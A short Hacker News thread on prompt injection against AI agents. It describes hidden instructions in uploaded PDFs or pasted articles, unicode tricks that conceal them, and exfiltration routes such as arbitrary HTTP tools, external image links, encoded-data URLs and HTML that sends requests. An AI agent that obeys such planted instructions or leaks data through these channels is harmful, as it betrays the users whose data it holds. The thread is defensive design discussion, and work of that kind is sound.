▲ | simonw 7 hours ago | ||||||||||||||||
The "exposure to untrusted data" one is the hardest to cut off, because you never know if a user might be tricked into uploading a PDF with hidden instructions, or copying and pasting in some long article that has instructions they didn't notice (or that used unicode tricks to hide themselves). The easiest leg to cut off is the exfiltration vectors. That's the solution most products take - make sure there's no tool for making arbitrary HTTP requests to other domains, and that the chat interface can't render an image that points to an external domain. If you let your agent send, receive and search email you're doomed. I think that's why there are very few products on the market that do that, despite the enormous demand for AI email assistants. | |||||||||||||||||
▲ | patapong 6 hours ago | parent | next [-] | ||||||||||||||||
I think stopping exfiltration will turn out to be hard as well, since the LLM can social engineer the user to help them exfiltrate the data. For example, an LLM could say "Go to this link to learn more about your problem", and then point them to a URL with encoded data, set up maliscious scripts for e.g. deploy hooks, or just output HTML that sends requests when opened. | |||||||||||||||||
| |||||||||||||||||
▲ | datadrivenangel 7 hours ago | parent | prev [-] | ||||||||||||||||
So the easiest solution is full human in the loop & approval for every external action... Agents are doomed :) |